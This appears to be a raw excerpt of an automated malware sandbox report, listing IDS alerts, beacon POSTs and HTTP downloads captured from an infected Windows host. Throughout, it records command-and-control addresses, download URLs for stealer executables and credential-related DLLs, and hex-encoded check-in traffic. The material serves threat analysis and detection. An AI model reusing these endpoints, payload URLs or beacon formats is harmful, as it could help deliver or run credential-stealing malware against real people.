Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"save------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 37 34 33 43 45 46 46 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA743CEFFFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build"save------AFCBAEBAEBFHCAKFCAKE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build"save------JEBKECAFIDAFIECBKEHD--
Source: Joe Sandbox View IP Address: 91.202.233.158
Source: Joe Sandbox View ASN Name: M247GB
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49603 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49605 -> 194.116.215.195:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49611 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49615 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49609 -> 185.215.113.26:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49613 -> 185.215.113.17:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49616 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49620 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49623 -> 185.215.113.117:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49626 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49629 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49632 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49634 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49631 -> 91.202.233.158:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49637 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49640 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49651 -> 185.215.113.103:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49659 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49646 -> 104.21.64.194:443
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=ufsw2WljgNe0HeEnxGfuql1fqO2W1xBNgPBmcLBXHDE-1727446725-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: drawzhotdog.shop
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0020BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile, 6_2_0020BD60
Source: global traffic HTTP traffic detected: GET /file1.exe HTTP/1.1Host: glthub.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/Microsoft-Edge.exe HTTP/1.1Host: eijfrhegrtbrfcd.online
Source: global traffic HTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/freebl3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/mozglue.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/msvcp140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/neon.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/nss3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/softokn3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /3836fd5700214436/vcruntime140.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: penis.exe, 00000019.00000002.2964689421.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: penis.exe, 00000019.00000002.2964689421.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
Source: penis.exe, 00000019.00000002.2964689421.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`, equals www.youtube.com (Youtube)
Source: penis.exe, 00000019.00000002.2964689421.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: penis.exe, 00000019.00000002.2964689421.0000000002F6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: google.com
Source: global traffic DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic DNS traffic detected: DNS query: glthub.ru
Source: global traffic DNS traffic detected: DNS query: eijfrhegrtbrfcd.online
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/mine/random.exe&
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.103/steam/random.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/LummaC222222.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/crypted.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/gold.exe8
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/gold.exeP
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/needmoney.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.117/inc/needmoney.exep6
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/15.113.16/Data
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/15.113.16/ferences.SourceAumid001
Source: axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/C
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpUsers
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpbg
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpft
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phphell32.dll
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpn
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.3526057863.000000000598A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/XN
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/cccc2.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/cccc2.exeJ
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/neon.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/newbundle2.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/newbundle2.exeX7
Source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/inc/penis.exe
